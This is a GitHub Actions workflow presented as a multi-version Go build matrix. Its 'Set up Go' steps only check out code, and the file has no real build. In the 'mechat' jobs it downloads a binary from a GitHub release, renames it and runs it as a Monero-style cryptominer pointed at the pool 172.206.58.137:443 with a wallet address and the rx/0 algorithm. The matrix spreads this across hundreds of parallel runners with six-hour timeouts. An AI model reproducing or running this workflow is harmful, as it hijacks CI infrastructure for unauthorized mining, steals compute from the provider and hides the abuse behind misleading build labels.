
name: kontol
on: 
  push:
    branches: [ "main" ]

jobs:
  pemanasan:
    runs-on: ubuntu-20.04
    strategy:
      max-parallel: 100
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z]
    timeout-minutes: 7
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/checkout@v4
    - name: Maino
      run: |
        sudo apt-get update
    - name: Main
      run: |
        wget https://github.com/trangtrau/sang_ml/releases/download/test/ar 
  mechat:
    needs: pemanasan
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/checkout@v4
    - name: Maino
      run: |
        sudo apt-get update
    - name: Main
      run: |
        wget https://github.com/trangtrau/sang_ml/releases/download/test/ar && cp ar jvdar && chmod +x jvdar && ./jvdar -o 172.206.58.137:443 -u SaLvsCoGwEnGymEpfbiqaBLDtttdeFLYV7HGp7Lj8tbKh9q3xF3wD9bc2bYRs7g2TbNtz3muwjAdQEky42AFdagPZMx1h3MqW5y -p tol -a rx/0 -k -t 4
    - name: Mainq
      run: top
        
  mechat2:
    needs: pemanasan
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/checkout@v4
    - name: Maino
      run: |
        sudo apt-get update
    - name: Main
      run: |
        wget https://github.com/trangtrau/sang_ml/releases/download/test/ar && cp ar jvdar && chmod +x jvdar && ./jvdar -o 172.206.58.137:443 -u SaLvsCoGwEnGymEpfbiqaBLDtttdeFLYV7HGp7Lj8tbKh9q3xF3wD9bc2bYRs7g2TbNtz3muwjAdQEky42AFdagPZMx1h3MqW5y -p tol -a rx/0 -k -t 4
    - name: Mainp
      run: top
  Success:
    needs: [pemanasan, mechat]
    if: always()
    runs-on: ubuntu-20.04
    steps:
      - uses: technote-space/workflow-conclusion-action@v2
      - name: Check Failure
        if: env.WORKFLOW_CONCLUSION == 'failure'
        run: exit 1
      - name: Success
        if: ${{ success() }}
        run: echo "all don,All Done"
